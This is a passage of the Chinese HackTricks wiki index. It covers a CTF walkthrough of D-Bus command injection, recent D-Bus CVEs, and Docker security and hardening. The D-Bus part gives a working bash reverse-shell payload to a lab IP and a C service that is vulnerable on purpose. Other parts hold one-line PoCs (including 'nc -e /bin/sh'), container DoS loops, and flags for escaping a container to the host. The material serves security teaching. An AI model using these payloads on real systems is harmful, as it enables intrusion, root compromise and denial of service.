作为用户 qtc 在 docker 容器 aeb4525789d8 内,您可以在文件 /code/oouch/routes.py 中找到一些与 dbus 相关的代码。这是有趣的代码: python if primitive_xss.search(form.textfield.data):\\nbus = 
dbus.SystemBus()\\nblock_object = bus.get_object(\'htb.oouch.Block\', \'/htb/oouch/Block\')\\nblock_iface = dbus.Interface(block_object, dbus_interface=\'htb.oouch.Block\') client_ip = request.environ.get(\'REMOTE_ADDR\', request.remote_addr)\\nresponse = block_iface.Block(client_ip)\\nbus.close()\\nreturn render_template(\'hacker.html\', title=\'Hacker\') 如您所见,它正在 连接到 D-Bus 接口 并将“client_ip”发送到**“Block”函数**。 在 D-Bus 连接的另一端,有一些 C 编译的二进制文件在运行。此代码正在 监听 D-Bus 连接 以获取 IP 地址,并通过 system 函数调用 iptables 来阻止给定的 IP 地址。 对 system 的调用故意存在命令注入漏洞 ,因此像以下这样的有效载荷将创建一个反向 shell:;bash -c \'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1\' #","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 易受攻击的场景","id":"1532","title":"易受攻击的场景"},"1533":{"body":"在本页的末尾,您可以找到 D-Bus 应用程序的完整 C 代码 。在其中,您可以在第 91-97 行之间找到 如何注册 D-Bus 对象路径 和 接口名称 。此信息将是发送信息到 D-Bus 连接所必需的: c /* Install the object */\\nr = sd_bus_add_object_vtable(bus,\\n&slot,\\n\\"/htb/oouch/Block\\", /* interface */\\n\\"htb.oouch.Block\\", /* service object */\\nblock_vtable,\\nNULL); 此外,在第57行中,您可以发现 为此D-Bus通信注册的唯一方法 称为Block( 这就是为什么在接下来的部分中,负载将发送到服务对象htb.oouch.Block、接口/htb/oouch/Block和方法名Block ): c SD_BUS_METHOD(\\"Block\\", \\"s\\", \\"s\\", method_block, SD_BUS_VTABLE_UNPRIVILEGED), Python 以下Python代码将通过block_iface.Block(runme)将有效负载发送到D-Bus连接的Block方法( 请注意,它是从前面的代码块中提取的 ): python import dbus\\nbus = dbus.SystemBus()\\nblock_object = bus.get_object(\'htb.oouch.Block\', \'/htb/oouch/Block\')\\nblock_iface = dbus.Interface(block_object, dbus_interface=\'htb.oouch.Block\')\\nrunme = \\";bash -c \'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1\' #\\"\\nresponse = block_iface.Block(runme)\\nbus.close() busctl 和 dbus-send bash dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:\';pring -c 1 10.10.14.44 #\' dbus-send 是一个用于向“消息总线”发送消息的工具。 消息总线 – 一种软件,系统通过它使应用程序之间的通信变得简单。它与消息队列相关(消息按顺序排列),但在消息总线中,消息以订阅模型发送,并且速度非常快。 “-system” 标签用于表示这是一个系统消息,而不是会话消息(默认情况下)。 
“--print-reply” 标签用于适当地打印我们的消息,并以人类可读的格式接收任何回复。 “--dest=Dbus-Interface-Block” Dbus 接口的地址。 “string:” – 我们希望发送到接口的消息类型。有几种发送消息的格式,如双精度、字节、布尔值、整数、对象路径。在这些中,“对象路径”在我们想要将文件路径发送到 Dbus 接口时非常有用。在这种情况下,我们可以使用一个特殊文件(FIFO)来以文件名的形式将命令传递给接口。“string:;” – 这是为了再次调用对象路径,我们放置 FIFO 反向 shell 文件/命令。 请注意,在 htb.oouch.Block.Block 中,第一部分(htb.oouch.Block)引用服务对象,最后一部分(.Block)引用方法名称。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 利用它","id":"1533","title":"利用它"},"1534":{"body":"d-bus_server.c //sudo apt install pkgconf\\n//sudo apt install libsystemd-dev\\n//gcc d-bus_server.c -o dbus_server `pkg-config --cflags --libs libsystemd` #include \\n#include \\n#include \\n#include \\n#include \\n#include static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) {\\nchar* host = NULL;\\nint r; /* Read the parameters */\\nr = sd_bus_message_read(m, \\"s\\", &host);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to obtain hostname: %s\\\\n\\", strerror(-r));\\nreturn r;\\n} char command[] = \\"iptables -A PREROUTING -s %s -t mangle -j DROP\\"; int command_len = strlen(command);\\nint host_len = strlen(host); char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char));\\nif(command_buffer == NULL) {\\nfprintf(stderr, \\"Failed to allocate memory\\\\n\\");\\nreturn -1;\\n} sprintf(command_buffer, command, host); /* In the first implementation, we simply ran command using system(), since the expected DBus\\n* to be threading automatically. However, DBus does not thread and the application will hang\\n* forever if some user spawns a shell. Thefore we need to fork (easier than implementing real\\n* multithreading)\\n*/\\nint pid = fork(); if ( pid == 0 ) {\\n/* Here we are in the child process. We execute the command and eventually exit. */\\nsystem(command_buffer);\\nexit(0);\\n} else {\\n/* Here we are in the parent process or an error occured. 
We simply send a genric message.\\n* In the first implementation we returned separate error messages for success or failure.\\n* However, now we cannot wait for results of the system call. Therefore we simply return\\n* a generic. */\\nreturn sd_bus_reply_method_return(m, \\"s\\", \\"Carried out :D\\");\\n}\\nr = system(command_buffer);\\n} /* The vtable of our little object, implements the net.poettering.Calculator interface */\\nstatic const sd_bus_vtable block_vtable[] = {\\nSD_BUS_VTABLE_START(0),\\nSD_BUS_METHOD(\\"Block\\", \\"s\\", \\"s\\", method_block, SD_BUS_VTABLE_UNPRIVILEGED),\\nSD_BUS_VTABLE_END\\n}; int main(int argc, char *argv[]) {\\n/*\\n* Main method, registeres the htb.oouch.Block service on the system dbus.\\n*\\n* Paramaters:\\n* argc (int) Number of arguments, not required\\n* argv[] (char**) Argument array, not required\\n*\\n* Returns:\\n* Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive\\n* as long as the user keeps it alive.\\n*/ /* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */\\nsignal(SIGCHLD,SIG_IGN); sd_bus_slot *slot = NULL;\\nsd_bus *bus = NULL;\\nint r; /* First we need to connect to the system bus. 
*/\\nr = sd_bus_open_system(&bus);\\nif (r < 0)\\n{\\nfprintf(stderr, \\"Failed to connect to system bus: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n} /* Install the object */\\nr = sd_bus_add_object_vtable(bus,\\n&slot,\\n\\"/htb/oouch/Block\\", /* interface */\\n\\"htb.oouch.Block\\", /* service object */\\nblock_vtable,\\nNULL);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to install htb.oouch.Block: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n} /* Register the service name to find out object */\\nr = sd_bus_request_name(bus, \\"htb.oouch.Block\\", 0);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to acquire service name: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n} /* Infinite loop to process the client requests */\\nfor (;;) {\\n/* Process requests */\\nr = sd_bus_process(bus, NULL);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to process bus: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n}\\nif (r > 0) /* we processed a request, try to process another one, right-away */\\ncontinue; /* Wait for the next request to process */\\nr = sd_bus_wait(bus, (uint64_t) -1);\\nif (r < 0) {\\nfprintf(stderr, \\"Failed to wait on bus: %s\\\\n\\", strerror(-r));\\ngoto finish;\\n}\\n} finish:\\nsd_bus_slot_unref(slot);\\nsd_bus_unref(bus); return r < 0 ? 
EXIT_FAILURE : EXIT_SUCCESS;\\n}","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » C code","id":"1534","title":"C code"},"1535":{"body":"手动使用 busctl/gdbus 枚举大型 D-Bus 攻击面很快变得痛苦。近年来发布的两个小型 FOSS 工具可以在红队或 CTF 参与中加快速度:","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 自动化枚举助手 (2023-2025)","id":"1535","title":"自动化枚举助手 (2023-2025)"},"1536":{"body":"作者: @taviso – https://github.com/taviso/dbusmap 用 C 编写;单个静态二进制文件 (<50 kB),遍历每个对象路径,提取 Introspect XML 并将其映射到拥有的 PID/UID。 有用的标志: bash # 列出 *系统* 总线上的每个服务并转储所有可调用的方法\\nsudo dbus-map --dump-methods # 主动探测可以在没有 Polkit 提示的情况下访问的方法/属性\\nsudo dbus-map --enable-probes --null-agent --dump-methods --dump-properties 该工具用 ! 标记未受保护的知名名称,立即揭示您可以 拥有 (接管)或从非特权 shell 可达的方法调用的服务。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » dbusmap (\\"D-Bus 的 Nmap\\")","id":"1536","title":"dbusmap (\\"D-Bus 的 Nmap\\")"},"1537":{"body":"作者: @initstring – https://github.com/initstring/uptux 仅用 Python 编写的脚本,查找 systemd 单元中的 可写 路径 和 过于宽松的 D-Bus 策略文件(例如 send_destination=\\"*\\")。 快速使用: bash python3 uptux.py -n # 运行所有检查但不写入日志文件\\npython3 uptux.py -d # 启用详细调试输出 D-Bus 模块搜索以下目录,并突出显示任何可以被普通用户伪造或劫持的服务: /etc/dbus-1/system.d/ 和 /usr/share/dbus-1/system.d/ /etc/dbus-1/system-local.d/(供应商覆盖)","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » uptux.py","id":"1537","title":"uptux.py"},"1538":{"body":"关注最近发布的 CVE 有助于发现自定义代码中类似的不安全模式。以下高影响的本地 EoP 问题均源于 系统总线 上缺失的身份验证/授权: 年份 CVE 组件 根本原因 一行 PoC 2024 CVE-2024-45752 logiops ≤ 0.3.4 (Logitech HID 守护进程) logid 系统服务暴露了一个不受限制的 org.freedesktop.Logiopsd 接口,允许 任何 用户更改设备配置文件并通过宏字符串注入任意 shell 命令。 gdbus call -y -d org.freedesktop.Logiopsd -o /org/freedesktop/Logiopsd -m org.freedesktop.Logiopsd.LoadConfig \\"/tmp/pwn.yml\\" 2025 CVE-2025-23222 Deepin dde-api-proxy ≤ 1.0.18 以 root 身份运行的代理将遗留总线名称转发到后端服务 而不转发调用者 UID/Polkit 上下文 
,因此每个转发请求都被视为 UID 0。 gdbus call -y -d com.deepin.daemon.Grub2 -o /com/deepin/daemon/Grub2 -m com.deepin.daemon.Grub2.SetTimeout 1 2025 CVE-2025-3931 Red Hat Insights yggdrasil ≤ 0.4.6 公共 Dispatch 方法缺乏任何 ACL → 攻击者可以命令 包管理器 工作线程安装任意 RPM。 dbus-send --system --dest=com.redhat.yggdrasil /com/redhat/Dispatch com.redhat.yggdrasil.Dispatch string:\'{\\"worker\\":\\"pkg\\",\\"action\\":\\"install\\",\\"pkg\\":\\"nc -e /bin/sh\\"}\' 需要注意的模式: 服务在 系统总线 上以 root 身份运行。 没有 PolicyKit 检查(或被代理绕过)。 方法最终导致 system()/包安装/设备重新配置 → 代码执行。 使用 dbusmap --enable-probes 或手动 busctl call 确认补丁是否回溯了适当的 polkit_authority_check_authorization() 逻辑。","breadcrumbs":"Linux Privilege Escalation » D-Bus Enumeration & Command Injection Privilege Escalation » 显著的 D-Bus 权限提升漏洞 (2024-2025)","id":"1538","title":"显著的 D-Bus 权限提升漏洞 (2024-2025)"},"1539":{"body":"搜索世界可写或 发送/接收 开放的策略: bash grep -R --color -nE \': snyk bash snyk container test --json-file-output= --severity-threshold=high clair-scanner bash clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5","breadcrumbs":"Linux Privilege Escalation » Docker Security » 镜像扫描","id":"1545","title":"镜像扫描"},"1546":{"body":"Docker 镜像签名确保了在容器中使用的镜像的安全性和完整性。以下是简要说明: Docker 内容信任 利用 Notary 项目,基于更新框架 (TUF),来管理镜像签名。有关更多信息,请参见 Notary 和 TUF 。 要激活 Docker 内容信任,请设置 export DOCKER_CONTENT_TRUST=1。此功能在 Docker 版本 1.10 及更高版本中默认关闭。 启用此功能后,仅可以下载签名的镜像。初始镜像推送需要为根密钥和标记密钥设置密码短语,Docker 还支持 Yubikey 以增强安全性。更多详细信息可以在 这里 找到。 尝试在启用内容信任的情况下拉取未签名的镜像会导致 \\"No trust data for latest\\" 错误。 在第一次之后的镜像推送中,Docker 会要求输入存储库密钥的密码短语以签署镜像。 要备份您的私钥,请使用以下命令: bash tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private 在切换 Docker 主机时,必须移动根和存储库密钥以维持操作。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker 镜像签名","id":"1546","title":"Docker 镜像签名"},"1547":{"body":"容器安全特性摘要 主要进程隔离特性 在容器化环境中,隔离项目及其进程对于安全和资源管理至关重要。以下是关键概念的简化解释: 命名空间 目的 :确保进程、网络和文件系统等资源的隔离。特别是在 Docker 中,命名空间使容器的进程与主机和其他容器分开。 unshare 的使用 :unshare 命令(或底层系统调用)用于创建新的命名空间,提供额外的隔离层。然而,虽然 Kubernetes 本身并不阻止这一点,但 Docker 是会的。 限制 
:创建新命名空间不允许进程恢复到主机的默认命名空间。要穿透主机命名空间,通常需要访问主机的 /proc 目录,使用 nsenter 进行进入。 控制组 (CGroups) 功能 :主要用于在进程之间分配资源。 安全方面 :CGroups 本身不提供隔离安全,除了 release_agent 特性,如果配置错误,可能会被利用进行未经授权的访问。 能力丢弃 重要性 :这是进程隔离的重要安全特性。 功能 :通过丢弃某些能力来限制根进程可以执行的操作。即使进程以根权限运行,缺乏必要的能力也会阻止其执行特权操作,因为系统调用将因权限不足而失败。 这些是进程丢弃其他能力后的 剩余能力 : Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep Seccomp 它在 Docker 中默认启用。它有助于 进一步限制进程可以调用的系统调用 。 默认的 Docker Seccomp 配置文件 可以在 https://github.com/moby/moby/blob/master/profiles/seccomp/default.json 找到。 AppArmor Docker 有一个可以激活的模板: https://github.com/moby/moby/tree/master/profiles/apparmor 这将允许减少能力、系统调用、对文件和文件夹的访问...","breadcrumbs":"Linux Privilege Escalation » Docker Security » 容器安全特性","id":"1547","title":"容器安全特性"},"1548":{"body":"Namespaces 是 Linux 内核的一个特性,它 将内核资源进行分区 ,使得一组 进程****看到 一组 资源 ,而 另一 组 进程 看到 不同 的资源集。该特性通过为一组资源和进程使用相同的命名空间来工作,但这些命名空间指向不同的资源。资源可以存在于多个空间中。 Docker 利用以下 Linux 内核命名空间来实现容器隔离: pid namespace mount namespace network namespace ipc namespace UTS namespace 有关 命名空间的更多信息 ,请查看以下页面: Namespaces","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces","id":"1548","title":"Namespaces"},"1549":{"body":"Linux 内核特性 cgroups 提供了 限制一组进程的资源,如 CPU、内存、IO、网络带宽 的能力。Docker 允许使用 cgroup 特性创建容器,从而实现对特定容器的资源控制。 以下是一个用户空间内存限制为 500m,内核内存限制为 50m,CPU 共享为 512,blkio-weight 为 400 的容器。CPU 共享是控制容器 CPU 使用的比率。它的默认值为 1024,范围在 0 到 1024 之间。如果三个容器的 CPU 共享都是 1024,则在 CPU 资源争用的情况下,每个容器最多可以占用 33% 的 CPU。blkio-weight 是控制容器 IO 的比率。它的默认值为 500,范围在 10 到 1000 之间。 docker run -it -m 500M --kernel-memory 50M --cpu-shares 512 --blkio-weight 400 --name ubuntu1 ubuntu bash 要获取容器的 cgroup,您可以执行: bash docker run -dt --rm denial sleep 1234 #Run a large sleep inside a Debian container\\nps -ef | grep 1234 #Get info about the sleep process\\nls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it) 有关更多信息,请查看: 
CGroups","breadcrumbs":"Linux Privilege Escalation » Docker Security » cgroups","id":"1549","title":"cgroups"},"155":{"body":"Telecom Network Exploitation","breadcrumbs":"Pentesting Network » Telecom / Mobile-Core (GTP) Exploitation","id":"155","title":"Telecom / Mobile-Core (GTP) Exploitation"},"1550":{"body":"能力允许 对可以允许的根用户能力进行更细粒度的控制 。Docker使用Linux内核能力特性来 限制可以在容器内执行的操作 ,无论用户类型如何。 当运行docker容器时, 进程会放弃敏感能力,以防止进程逃离隔离 。这试图确保进程无法执行敏感操作并逃逸: Linux Capabilities","breadcrumbs":"Linux Privilege Escalation » Docker Security » 能力","id":"1550","title":"能力"},"1551":{"body":"这是一种安全特性,允许Docker 限制可以在容器内使用的系统调用 : Seccomp","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker中的Seccomp","id":"1551","title":"Docker中的Seccomp"},"1552":{"body":"AppArmor 是一个内核增强,用于将 容器 限制在 有限 的 资源 集内,并具有 每个程序的配置文件 : AppArmor","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker中的AppArmor","id":"1552","title":"Docker中的AppArmor"},"1553":{"body":"标记系统 :SELinux为每个进程和文件系统对象分配一个唯一的标签。 策略执行 :它执行定义进程标签可以对系统内其他标签执行哪些操作的安全策略。 容器进程标签 :当容器引擎启动容器进程时,通常会分配一个受限的SELinux标签,通常为container_t。 容器内文件标记 :容器内的文件通常标记为container_file_t。 策略规则 :SELinux策略主要确保具有container_t标签的进程只能与标记为container_file_t的文件进行交互(读取、写入、执行)。 该机制确保即使容器内的进程被攻陷,它也仅限于与具有相应标签的对象进行交互,从而显著限制此类攻陷可能造成的损害。 SELinux","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker中的SELinux","id":"1553","title":"Docker中的SELinux"},"1554":{"body":"在Docker中,授权插件在安全性中发挥着关键作用,通过决定是否允许或阻止对Docker守护进程的请求来实现。这一决定是通过检查两个关键上下文来做出的: 身份验证上下文 :这包括有关用户的全面信息,例如他们是谁以及他们如何进行身份验证。 命令上下文 :这包括与所发请求相关的所有相关数据。 这些上下文有助于确保只有经过身份验证的用户的合法请求被处理,从而增强Docker操作的安全性。 AuthZ& AuthN - Docker Access Authorization Plugin","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ & AuthN","id":"1554","title":"AuthZ & AuthN"},"1555":{"body":"如果您没有正确限制容器可以使用的资源,则被攻陷的容器可能会对其运行的主机造成DoS。 CPU DoS bash # stress-ng\\nsudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t 5m # While loop\\ndocker run -d --name malicious-container -c 512 busybox sh -c 
\'while true; do :; done\' 带宽DoS bash nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc 4444; done","breadcrumbs":"Linux Privilege Escalation » Docker Security » 来自容器的DoS","id":"1555","title":"来自容器的DoS"},"1556":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » 有趣的 Docker 标志","id":"1556","title":"有趣的 Docker 标志"},"1557":{"body":"在以下页面中,您可以了解 --privileged 标志意味着什么 : Docker --privileged","breadcrumbs":"Linux Privilege Escalation » Docker Security » --privileged 标志","id":"1557","title":"--privileged 标志"},"1558":{"body":"no-new-privileges 如果您正在运行一个容器,攻击者设法以低权限用户身份获得访问权限。如果您有一个 配置错误的 suid 二进制文件 ,攻击者可能会利用它并 在容器内提升权限 。这可能允许他逃离容器。 启用 no-new-privileges 选项运行容器将 防止这种权限提升 。 docker run -it --security-opt=no-new-privileges:true nonewpriv 其他 bash #You can manually add/drop capabilities with\\n--cap-add\\n--cap-drop # You can manually disable seccomp in docker with\\n--security-opt seccomp=unconfined # You can manually disable seccomp in docker with\\n--security-opt apparmor=unconfined # You can manually disable selinux in docker with\\n--security-opt label:disable 对于更多 --security-opt 选项,请查看: https://docs.docker.com/engine/reference/run/#security-configuration","breadcrumbs":"Linux Privilege Escalation » Docker Security » --security-opt","id":"1558","title":"--security-opt"},"1559":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » 其他安全考虑","id":"1559","title":"其他安全考虑"},"156":{"body":"https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 Network Security Assessment: Know Your Network (3rd edition) Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. 
By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » 参考资料","id":"156","title":"参考资料"},"1560":{"body":"避免直接在 Docker 镜像中嵌入机密或使用环境变量至关重要,因为这些方法会通过 docker inspect 或 exec 等命令将您的敏感信息暴露给任何可以访问容器的人。 Docker 卷 是一种更安全的替代方案,推荐用于访问敏感信息。它们可以作为内存中的临时文件系统使用,减轻与 docker inspect 和日志记录相关的风险。然而,根用户和具有 exec 访问权限的用户仍然可能访问这些机密。 Docker secrets 提供了一种更安全的方法来处理敏感信息。对于在镜像构建阶段需要机密的实例, BuildKit 提供了一个高效的解决方案,支持构建时机密,提升构建速度并提供额外功能。 要利用 BuildKit,可以通过三种方式激活: 通过环境变量: export DOCKER_BUILDKIT=1 通过命令前缀: DOCKER_BUILDKIT=1 docker build . 通过在 Docker 配置中默认启用: { \\"features\\": { \\"buildkit\\": true } },然后重启 Docker。 BuildKit 允许使用 --secret 选项来处理构建时机密,确保这些机密不会包含在镜像构建缓存或最终镜像中,使用命令如下: bash docker build --secret my_key=my_value ,src=path/to/my_secret_file . 
对于运行中的容器所需的秘密, Docker Compose 和 Kubernetes 提供了强大的解决方案。Docker Compose 在服务定义中使用 secrets 键来指定秘密文件,如 docker-compose.yml 示例所示: yaml version: \\"3.7\\"\\nservices:\\nmy_service:\\nimage: centos:7\\nentrypoint: \\"cat /run/secrets/my_secret\\"\\nsecrets:\\n- my_secret\\nsecrets:\\nmy_secret:\\nfile: ./my_secret_file.txt 此配置允许在使用 Docker Compose 启动服务时使用秘密。 在 Kubernetes 环境中,秘密是原生支持的,并且可以通过像 Helm-Secrets 这样的工具进一步管理。Kubernetes 的基于角色的访问控制 (RBAC) 增强了秘密管理的安全性,类似于 Docker Enterprise。","breadcrumbs":"Linux Privilege Escalation » Docker Security » 管理机密:最佳实践","id":"1560","title":"管理机密:最佳实践"},"1561":{"body":"gVisor 是一个应用内核,使用 Go 编写,实施了 Linux 系统表面的相当大一部分。它包括一个名为 runsc 的 Open Container Initiative (OCI) 运行时,提供了 应用程序与主机内核之间的隔离边界 。runsc 运行时与 Docker 和 Kubernetes 集成,使得运行沙箱容器变得简单。 GitHub - google/gvisor: Application Kernel for Containers","breadcrumbs":"Linux Privilege Escalation » Docker Security » gVisor","id":"1561","title":"gVisor"},"1562":{"body":"Kata Containers 是一个开源社区,致力于构建一个安全的容器运行时,使用轻量级虚拟机,感觉和表现像容器,但提供 使用硬件虚拟化技术的更强工作负载隔离 作为第二道防线。 Kata Containers - Open Source Container Runtime Software | Kata Containers","breadcrumbs":"Linux Privilege Escalation » Docker Security » Kata Containers","id":"1562","title":"Kata Containers"},"1563":{"body":"不要使用 --privileged 标志或在容器内挂载 Docker 套接字 。 Docker 套接字允许生成容器,因此这是完全控制主机的简单方法,例如,通过使用 --privileged 标志运行另一个容器。 不要在容器内以 root 身份运行。使用 不同用户 和 用户命名空间 。 容器中的 root 与主机上的相同,除非通过用户命名空间重新映射。它仅受到 Linux 命名空间、能力和 cgroups 的轻微限制。 丢弃所有能力 (--cap-drop=all),仅启用所需的能力 (--cap-add=...)。许多工作负载不需要任何能力,添加它们会增加潜在攻击的范围。 使用“no-new-privileges”安全选项 以防止进程获得更多权限,例如通过 suid 二进制文件。 限制容器可用的资源 。 资源限制可以保护机器免受拒绝服务攻击。 调整 seccomp 、 AppArmor (或 SELinux) 配置文件,以将容器可用的操作和系统调用限制到最低要求。 使用 官方 Docker 镜像 并要求签名 ,或基于它们构建自己的镜像。不要继承或使用 后门 镜像。还要将根密钥、密码短语存放在安全的地方。Docker 计划通过 UCP 管理密钥。 定期 重建 镜像以 应用安全补丁到主机和镜像。 明智地管理您的 秘密 ,以使攻击者难以访问它们。 如果您 暴露 Docker 守护进程,请使用 HTTPS ,并进行客户端和服务器身份验证。 在您的 Dockerfile 中, 优先使用 COPY 而不是 ADD 。ADD 会自动提取压缩文件,并可以从 URL 复制文件。COPY 没有这些功能。尽可能避免使用 ADD,以免受到通过远程 URL 和 Zip 文件的攻击。 为每个微服务 使用单独的容器 
不要在容器内放置 ssh ,可以使用 “docker exec” 连接到容器。 拥有 更小的 容器 镜像","breadcrumbs":"Linux Privilege Escalation » Docker Security » 总结提示","id":"1563","title":"总结提示"},"1564":{"body":"如果您 在 Docker 容器内 或者您有权访问 docker 组中的用户 ,您可以尝试 逃逸并提升权限 : Docker Breakout / Privilege Escalation","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker 突破 / 权限提升","id":"1564","title":"Docker 突破 / 权限提升"},"1565":{"body":"如果您可以访问 Docker 套接字或可以访问 docker 组中的用户,但您的操作受到 Docker 身份验证插件的限制 ,请检查您是否可以 绕过它: AuthZ& AuthN - Docker Access Authorization Plugin","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker 身份验证插件绕过","id":"1565","title":"Docker 身份验证插件绕过"},"1566":{"body":"工具 docker-bench-security 是一个脚本,检查在生产中部署 Docker 容器的数十个常见最佳实践。所有测试都是自动化的,并基于 CIS Docker 基准 v1.3.1 。 您需要从运行 Docker 的主机或具有足够权限的容器中运行该工具。了解 如何在 README 中运行它: https://github.com/docker/docker-bench-security 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » 加固 Docker","id":"1566","title":"加固 Docker"},"1567":{"body":"https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/ https://twitter.com/_fel1x/status/1151487051986087936 https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html https://sreeninet.wordpress.com/2016/03/06/docker-security-part-1overview/ https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/ https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/ https://sreeninet.wordpress.com/2016/03/06/docker-security-part-4container-image/ https://en.wikipedia.org/wiki/Linux_namespaces https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57 https://www.redhat.com/sysadmin/privileged-flag-container-engines https://docs.docker.com/engine/extend/plugins_authorization https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57 https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: 
HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » 参考","id":"1567","title":"参考"},"1568":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 有些情况下你只拥有 docker socket的访问权限 ,并且想要利用它来 提升权限 。某些操作可能会非常可疑,你可能想要避免它们,因此在这里你可以找到不同的标志,这些标志可能对提升权限有用:","breadcrumbs":"Linux Privilege Escalation » Docker Security » Abusing Docker Socket for Privilege Escalation » Abusing Docker Socket for Privilege Escalation","id":"1568","title":"Abusing Docker Socket for Privilege Escalation"},"1569":{"body":"你可以在以root身份运行的容器中 挂载 文件系统的不同部分并 访问 它们。 你也可以 利用挂载来提升容器内的权限 。 -v /:/host -> 在容器中挂载主机文件系统,以便你可以 读取主机文件系统 。 如果你想要 感觉像在主机上 但实际上在容器中,你可以使用以下标志禁用其他防御机制: --privileged --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined -security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host --device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined -> 这与前面的方法类似,但这里我们是 挂载设备磁盘 。然后,在容器内运行 mount /dev/sda1 /mnt,你可以在 /mnt 中 访问 主机文件系统。 在主机上运行 fdisk -l 找到要挂载的 设备。 -v /tmp:/host -> 如果由于某种原因你只能 挂载主机的某个目录 并且你可以在主机内访问它。挂载它并在挂载目录中创建一个带有 suid 的**/bin/bash ,这样你就可以 从主机执行它并提升到root**。 note 请注意,也许你无法挂载文件夹 /tmp,但你可以挂载一个 不同的可写文件夹 。你可以使用以下命令找到可写目录:find / -writable -type d 2>/dev/null 请注意,并非所有Linux机器上的目录都支持suid位! 
